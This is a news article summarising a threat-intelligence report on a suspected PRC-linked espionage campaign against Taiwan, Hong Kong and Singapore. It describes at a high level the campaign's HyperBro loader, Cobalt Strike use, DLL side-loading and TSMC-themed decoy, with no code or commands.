East Asia’s Semiconductor Industry Targeted in New Espionage Campaign

In a comprehensive investigation, analysts at EclecticIQ have unearthed a sophisticated cyber-espionage operation aimed at Mandarin/Chinese-speaking East Asian regions, notably Taiwan, Hong Kong, and Singapore. The assailants leveraged a HyperBro loader variant and cunningly cloaked their malicious intent with a ruse related to Taiwan Semiconductor Manufacturing (TSMC).

This campaign displays significant overlaps with tactics, techniques, and procedures (TTPs) previously linked to cyber espionage initiatives backed by the People’s Republic of China (PRC). The centerpiece of this attack is the HyperBro loader variant, a piece of malware known for its use in in-memory execution of the Cobalt Strike beacon – a tool originally developed for penetration testing but has since been co-opted by malicious actors. To perfect their subterfuge, the threat actors employed a previously undocumented malware downloader, making use of the BitsTransfer module in PowerShell.

Not stopping there, the culprits also compromised a Cobra DocGuard server. This was likely done to house a GO-based backdoor, aptly named “ChargeWeapon” by the EclecticIQ team. This backdoor’s main function is to extract and relay information about a compromised system to its controller.

One notable strategy used in this attack was DLL side-loading, a technique known for its efficacy in bypassing defenses. Leveraging legitimate applications, attackers can invoke malicious payloads, thus evading detection. Moreover, the assailants took advantage of the victim’s familiarity with TSMC, presenting them with a TSMC-themed PDF decoy, written in traditional Mandarin, after deploying the HyperBro loader. This cunning diversion ensured the target remained unsuspecting.

Interestingly, these deceptive tactics are not new. EclecticIQ’s findings resonate with those of Recorded Future, which recently reported on the activities of a Chinese state-sponsored group named RedHotel. The parallels between the two reports are unmistakable, from the similar PDB file paths to the use of Cobalt Strike.

Furthermore, referencing past reports, it’s evident that the HyperBro malware family has been active since 2018, often associated with the APT27 group. This group has a history of using the DLL side-loading technique, and while the recent campaign saw the same strategy employed, there were no further overlaps identified with APT27.

But what stands out is the exploitation of the Cobra DocGuard servers. Reports from Symantec and ESET have noted that these servers have previously been abused for targeting organizations in Hong Kong. Both reports attribute these malicious activities to APT groups backed by the PRC.

This elaborate cyber espionage campaign reveals the ever-evolving strategies of cyber adversaries. The seamless integration of multiple malicious tools and techniques, combined with a deep understanding of regional nuances, makes such campaigns extremely potent. As cyber espionage continues to be a tool of choice for state-backed actors, industries worldwide must remain vigilant and invest in robust cyber defense mechanisms.